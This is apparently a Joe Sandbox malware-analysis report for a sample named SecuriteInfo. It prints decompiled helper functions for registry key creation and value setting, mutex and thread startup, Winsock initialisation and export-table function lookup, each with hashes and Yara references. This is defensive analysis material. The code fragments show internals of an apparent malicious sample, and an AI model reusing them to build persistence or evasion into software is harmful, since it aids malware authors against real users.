                                                                    • Instruction Fuzzy Hash: A4E01275A4031876DAB0A556AC0DF877A6DDBC4711F0405B1BA58E62C1ED60DD498AA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D20F6E Relevance: 1.5, APIs: 1, Instructions: 28registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E02D20F6E(void** __ecx, short** _a8) {
				int _v8;
				signed int _t8;

				_push(__ecx);
				_v8 = 0;
				_t8 = RegCreateKeyExW(0x80000001,  *_a8, 0, 0, 1, 1, 0, __ecx,  &_v8); // executed
				if(_t8 != 0) {
					return 0;
				}
				return (_t8 & 0xffffff00 | _v8 == 0x00000001) + 1;
			}





                                                                    0x02d20f71
                                                                    0x02d20f86
                                                                    0x02d20f8e
                                                                    0x02d20f97
                                                                    0x00000000
                                                                    0x02d20fa3
                                                                    0x00000000

                                                                    APIs
                                                                    • RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,745D0770,?,?,02D21165,?,?), ref: 02D20F8E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: a2fe33215ae86da3e5f6f9a8aac277b01fb6c83848356b4541e8423df7dc71cb
                                                                    • Instruction ID: 7001d316812dd7b37392bde13b3774a1013383a5f25663e9abe60a292a48f38d
                                                                    • Opcode Fuzzy Hash: a2fe33215ae86da3e5f6f9a8aac277b01fb6c83848356b4541e8423df7dc71cb
                                                                    • Instruction Fuzzy Hash: 7AE0DF32515229FFDB30CA528E08FCB3F6CDF95BE8F008054F50AA2280C2B18A04D6F0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D131D4 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D131D4(WCHAR** __ecx, WCHAR** __edx, void* __eflags) {
				short _v1028;
				WCHAR** _t14;
				WCHAR** _t15;

				_t15 = __edx;
				_t14 = __ecx;
				E02D11052( &_v1028, 0, 0x400);
				ExpandEnvironmentStringsW( *_t15,  &_v1028, 0x1ff);
				E02D135E5(_t14,  &_v1028); // executed
				return _t14;
			}






                                                                    0x02d131ed
                                                                    0x02d131ef
                                                                    0x02d131f1
                                                                    0x02d13207
                                                                    0x02d13216
                                                                    0x02d13220

                                                                    APIs
                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 02D13207
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$EnvironmentExpandStringslstrcpy
                                                                    • String ID:
                                                                    • API String ID: 1709970682-0
                                                                    • Opcode ID: cb4c67136f1c8355af3aa44115590a999d2c313d95f8aaf881fe09b8d2a8d915
                                                                    • Instruction ID: 4cb20e2c0dade92fa7970569359adacd6ad566025935a49133fd5d18db1658c5
                                                                    • Opcode Fuzzy Hash: cb4c67136f1c8355af3aa44115590a999d2c313d95f8aaf881fe09b8d2a8d915
                                                                    • Instruction Fuzzy Hash: 8DE048B6B4011977DB30A615AC05F9677ADDFC4718F1404B5BB08F22C0E975DD0ACBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D13335 Relevance: 1.5, APIs: 1, Instructions: 25stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D13335(WCHAR** __ecx, void* __eflags, WCHAR** _a4) {
				void* _t4;
				WCHAR* _t6;
				WCHAR** _t8;
				WCHAR** _t14;

				_t14 = _a4;
				_t8 = __ecx;
				_t4 = E02D13261(_t14);
				_t6 = E02D15E46( *((intOrPtr*)(__ecx)), 4 + (_t4 + E02D13261(__ecx)) * 2); // executed
				 *_t8 = _t6;
				return lstrcatW(_t6,  *_t14);
			}







                                                                    0x02d1333b
                                                                    0x02d1333e
                                                                    0x02d13342
                                                                    0x02d1335b
                                                                    0x02d13360
                                                                    0x02d1336f

                                                                    APIs
                                                                      • Part of subcall function 02D13261: lstrlenW.KERNEL32(745D0770,02D13646,?,?,?,02D2150A,02D235DB,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,02D235AB,00000000,745D0770,00000000), ref: 02D13268
                                                                    • lstrcatW.KERNEL32(00000000,745D0770), ref: 02D13365
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcatlstrlen
                                                                    • String ID:
                                                                    • API String ID: 1475610065-0
                                                                    • Opcode ID: 43efe19326316533e761432fde4d44b3b9075abe5b044def351b6dd0d6407c39
                                                                    • Instruction ID: 95c0235b1adcc178bef66b04adf47cfc3c6b31f4e163dbf9404519b9c9f252a1
                                                                    • Opcode Fuzzy Hash: 43efe19326316533e761432fde4d44b3b9075abe5b044def351b6dd0d6407c39
                                                                    • Instruction Fuzzy Hash: DAE0DF72600210ABCB046BA9F8C486EBB9EEFD5360F044436EE05D7300EA306C208EE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D21039 Relevance: 1.5, APIs: 1, Instructions: 25registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D21039(void** __ecx, short** _a4, char** _a8, int _a12) {
				long _t8;
				void* _t13;

				_t13 =  *__ecx;
				if(_t13 == 0) {
					L3:
					return 0;
				}
				_t8 = RegSetValueExW(_t13,  *_a4, 0, _a12,  *_a8, _a8[1]); // executed
				if(_t8 != 0) {
					goto L3;
				}
				return _t8 + 1;
			}





                                                                    0x02d2103d
                                                                    0x02d21041
                                                                    0x02d21065
                                                                    0x00000000
                                                                    0x02d21065
                                                                    0x02d21058
                                                                    0x02d21060
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    • RegSetValueExW.KERNEL32(?,745D0770,00000000,?,?,?,?,?,02D21432,00000000,00000000,?,00000001,?,?,?), ref: 02D21058
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID:
                                                                    • API String ID: 3702945584-0
                                                                    • Opcode ID: 07f899f137bbaef725b6d810f81f036aef6f547035d9f23e32c5271f936b2fad
                                                                    • Instruction ID: 3df984d82247d7163dd5768a3db73140c202faac8def5b041f7ebabe76bed17f
                                                                    • Opcode Fuzzy Hash: 07f899f137bbaef725b6d810f81f036aef6f547035d9f23e32c5271f936b2fad
                                                                    • Instruction Fuzzy Hash: F2E01A322011A4AFDB108F54C945EAB77A8EB59B54F258059FE099B311D731EC14DBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D158D3 Relevance: 1.5, APIs: 1, Instructions: 23networkCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E02D158D3(void* __ecx, void* __eflags) {

				E02D131C3(__ecx);
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				E02D20298(__ecx + 0x1d8, __ecx);
				__imp__#115(2, __ecx + 0x38); // executed
				 *(__ecx + 0xc) =  *(__ecx + 0xc) | 0xffffffff;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				return __ecx;
			}



                                                                    0x02d158d7
                                                                    0x02d158de
                                                                    0x02d158e1
                                                                    0x02d158eb
                                                                    0x02d158ee
                                                                    0x02d158f1
                                                                    0x02d158fc
                                                                    0x02d15902
                                                                    0x02d15908
                                                                    0x02d1590b
                                                                    0x02d15910

                                                                    APIs
                                                                      • Part of subcall function 02D20298: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,02D1FEDE,?,?,02D20459,?,745D0770,00000000,02D15A34), ref: 02D202A0
                                                                    • WSAStartup.WS2_32(00000002,?), ref: 02D158FC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateMutexStartup
                                                                    • String ID:
                                                                    • API String ID: 3730780901-0
                                                                    • Opcode ID: 7294fe3acef5c8d7f952344964301ba7046ec7e9ade3436c4920bc25b7aa412b
                                                                    • Instruction ID: f66a046362cea349755752b4e344cf677dfcf15e5795098a1d5c9954a7b6aafe
                                                                    • Opcode Fuzzy Hash: 7294fe3acef5c8d7f952344964301ba7046ec7e9ade3436c4920bc25b7aa412b
                                                                    • Instruction Fuzzy Hash: F9E0C071501B109BC2709F1AA544857FBE8FFA07207001B1F949782A50C770A5498F60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1FDA5 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1FDA5(intOrPtr* __ecx, intOrPtr _a4) {
				intOrPtr* _t10;

				_t10 = __ecx;
				E02D13125(__ecx + 4, _a4); // executed
				 *_t10 = CreateEventA(0, 1, 0,  *(_t10 + 4));
				return 1;
			}




                                                                    0x02d1fdad
                                                                    0x02d1fdb2
                                                                    0x02d1fdc6
                                                                    0x02d1fdce

                                                                    APIs
                                                                      • Part of subcall function 02D13125: lstrcatA.KERNEL32(00000000,745D0770,?,00000000,?,02D135C4,00000000,00000000,?,02D14E98,?,?,?,?,?,00000000), ref: 02D13151
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 02D1FDC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateEventlstrcat
                                                                    • String ID:
                                                                    • API String ID: 2275612694-0
                                                                    • Opcode ID: 583ba9e5ff1c630d7519a247e93a878dc97aa2774164c12a8283615a17a1f46e
                                                                    • Instruction ID: 233f309d94d1901e8dfc9d07eb87573a8a010c3685eac4e206a7eae8e6b23cdd
                                                                    • Opcode Fuzzy Hash: 583ba9e5ff1c630d7519a247e93a878dc97aa2774164c12a8283615a17a1f46e
                                                                    • Instruction Fuzzy Hash: 36D0A733244205BBD711EF91EC06F86FF6AFB65770F104026F65996680DBB1A434CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D23058 Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			_entry_(char _a8) {

				_t1 =  &_a8;
				 *_t1 = _a8 - 1;
				if( *_t1 == 0) {
					CreateThread(0, 0, E02D15CE2, 0, 0, 0); // executed
				}
				return 1;
			}



                                                                    0x02d2305b
                                                                    0x02d2305b
                                                                    0x02d2305f
                                                                    0x02d2306d
                                                                    0x02d2306d
                                                                    0x02d23077

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: 35ca33b41ad3502360cd4b25911e7f0f3d1f10f9bcc2a10708bd7cd514091f91
                                                                    • Instruction ID: 2aefb0253a1ce7eacd0723de19779b2d89d8b0f10babf8d8b6e323968990e4e2
                                                                    • Opcode Fuzzy Hash: 35ca33b41ad3502360cd4b25911e7f0f3d1f10f9bcc2a10708bd7cd514091f91
                                                                    • Instruction Fuzzy Hash: 01C08CB19D02187F76005EB13E0CE37338CEB242187908860BC12C1600D928CC688AB1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D20298 Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D20298(void** __ecx) {
				void* _t5;
				void** _t10;

				_t10 = __ecx;
				_t5 = CreateMutexA(0, 0, 0); // executed
				 *_t10 = _t5;
				_t10[1] = 0 | _t5 != 0xffffffff;
				return _t10;
			}





                                                                    0x02d2029b
                                                                    0x02d202a0
                                                                    0x02d202a8
                                                                    0x02d202b2
                                                                    0x02d202b6

                                                                    APIs
                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,02D1FEDE,?,?,02D20459,?,745D0770,00000000,02D15A34), ref: 02D202A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateMutex
                                                                    • String ID:
                                                                    • API String ID: 1964310414-0
                                                                    • Opcode ID: dd2afd6d30d018410b6e0feee4d3272176d0e44d0dc84bb4931143d53a87e0f5
                                                                    • Instruction ID: 3772000fd42243eae0a8e7b5262370a2eb16e098ba7f8fd6b03ff792a2718426
                                                                    • Opcode Fuzzy Hash: dd2afd6d30d018410b6e0feee4d3272176d0e44d0dc84bb4931143d53a87e0f5
                                                                    • Instruction Fuzzy Hash: E8D012B19005205FA3249F395C4886776DDEF98720316CE29B4A5CB2C4E6308C508770
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D15558 Relevance: 1.5, APIs: 1, Instructions: 12networkCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 75%
                                                                    			E02D15558(void** __ecx, void* __eflags) {
				int _t7;
				void* _t12;
				void* _t13;

				__imp__#116(_t13); // executed
				E02D20283( &(__ecx[0x76]));
				E02D13036( &(__ecx[0xc]));
				E02D13036( &(__ecx[4]));
				_t12 =  *__ecx;
				_t7 = VirtualFree(_t12, 0, 0x8000); // executed
				return _t7;
			}






                                                                    0x02d1555b
                                                                    0x02d15567
                                                                    0x02d1556f
                                                                    0x02d15577
                                                                    0x02d1557c
                                                                    0x02d15ead
                                                                    0x02d15eb3

                                                                    APIs
                                                                    • WSACleanup.WS2_32 ref: 02D1555B
                                                                      • Part of subcall function 02D20283: ReleaseMutex.KERNEL32(?,?,02D1FEFD,02D2359A,02D15BEC,02D2359A,00000000,00000000,00000000,00000000,?,?,?,?,00000000,.bss), ref: 02D20288
                                                                      • Part of subcall function 02D20283: FindCloseChangeNotification.KERNEL32(?), ref: 02D20290
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ChangeCleanupCloseFindMutexNotificationRelease
                                                                    • String ID:
                                                                    • API String ID: 1413882471-0
                                                                    • Opcode ID: b1ad43a2bd08640039e9b8382db46a82f193e549f1d8cea0300631f54ba6e6d8
                                                                    • Instruction ID: 9e3241766e871e3883bdf1da3f7b392ee9993005d053b13e6512ec6dbba1921f
                                                                    • Opcode Fuzzy Hash: b1ad43a2bd08640039e9b8382db46a82f193e549f1d8cea0300631f54ba6e6d8
                                                                    • Instruction Fuzzy Hash: 79D092308546559BC2B8EF30E9A08E9B3A2FF64350B90096E849313A90AF61AD09CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D20FAE Relevance: 1.5, APIs: 1, Instructions: 9registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D20FAE(void** __ecx) {
				long _t1;
				signed int* _t3;

				_t3 = __ecx;
				if( *__ecx != 0) {
					_t1 = RegCloseKey( *__ecx); // executed
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t1;
			}





                                                                    0x02d20faf
                                                                    0x02d20fb4
                                                                    0x02d20fb8
                                                                    0x02d20fb8
                                                                    0x02d20fbe
                                                                    0x02d20fc2

                                                                    APIs
                                                                    • RegCloseKey.KERNEL32(?,?,02D2112D,?,?,02D236DB), ref: 02D20FB8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 9d09a09d2c9fb8192b9f184ff15d098c3dc848cb14233f85542f95e8cd6b5a64
                                                                    • Instruction ID: 9c7f224c0bdb615cc4fdb7af00fc14e9b180bcd05ac289411e193af83408cc16
                                                                    • Opcode Fuzzy Hash: 9d09a09d2c9fb8192b9f184ff15d098c3dc848cb14233f85542f95e8cd6b5a64
                                                                    • Instruction Fuzzy Hash: 9DC04C31454221CBD7351F14F504790B7E5AB14316F25085DD4C055194A7B50CD4CE44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1F71F Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SHCreateDirectoryExW.SHELL32(00000000,?,00000000,02D211A6,00000000,?,?,?,?,00000000,745D0770,00000000), ref: 02D1F725
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateDirectory
                                                                    • String ID:
                                                                    • API String ID: 4241100979-0
                                                                    • Opcode ID: 68e2826450fd4e55ccafb2be46ed01717b62dcb1e81e31cfae363539f7efb339
                                                                    • Instruction ID: 34dc582b230ecbfedd994e2500228f96741cc75ea60eeec0f77960ce78e0189b
                                                                    • Opcode Fuzzy Hash: 68e2826450fd4e55ccafb2be46ed01717b62dcb1e81e31cfae363539f7efb339
                                                                    • Instruction Fuzzy Hash: BEB012307E830157DA101A708C06F1036119B52F07F200560B156C80D4C65100145504
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D20969 Relevance: 1.3, APIs: 1, Instructions: 49stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E02D20969(void* __ecx, CHAR* __edx, void* __eflags) {
				CHAR* _v8;
				char _v12;
				void* _t20;
				intOrPtr _t22;
				int _t25;
				void* _t31;
				void* _t38;
				signed int _t41;

				_push(__ecx);
				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_t41 = 0;
				_t31 = __ecx;
				_t38 = E02D2064E(__ecx, __eflags, 0,  &_v12);
				if(_t38 == 0) {
					L4:
					_t20 = 0;
				} else {
					_t22 =  *((intOrPtr*)(_t38 + 0x20)) + __ecx;
					_v12 = _t22;
					if( *((intOrPtr*)(_t38 + 0x18)) <= 0) {
						goto L4;
					} else {
						while(1) {
							_t25 = lstrcmpA( *((intOrPtr*)(_t22 + _t41 * 4)) + _t31, _v8); // executed
							if(_t25 == 0) {
								break;
							}
							_t22 = _v12;
							_t41 = _t41 + 1;
							if(_t41 <  *((intOrPtr*)(_t38 + 0x18))) {
								continue;
							} else {
								goto L4;
							}
							goto L5;
						}
						_t20 =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x1c)) + _t31 + ( *( *((intOrPtr*)(_t38 + 0x24)) + _t41 * 2 + _t31) & 0x0000ffff) * 4)) + _t31;
					}
				}
				L5:
				return _t20;
			}











                                                                    0x02d2096c
                                                                    0x02d2096d
                                                                    0x02d20971
                                                                    0x02d20975
                                                                    0x02d20979
                                                                    0x02d2097b
                                                                    0x02d20983
                                                                    0x02d2098a
                                                                    0x02d209b5
                                                                    0x02d209b5
                                                                    0x02d2098c
                                                                    0x02d2098f
                                                                    0x02d20991
                                                                    0x02d20997
                                                                    0x00000000
                                                                    0x02d20999
                                                                    0x02d20999
                                                                    0x02d209a2
                                                                    0x02d209aa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d209ac
                                                                    0x02d209af
                                                                    0x02d209b3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d209b3
                                                                    0x02d209ce
                                                                    0x02d209ce
                                                                    0x02d20997
                                                                    0x02d209b7
                                                                    0x02d209bb

                                                                    APIs
                                                                    • lstrcmpA.KERNEL32(?,02D21BD0,?,open,02D21BD0), ref: 02D209A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
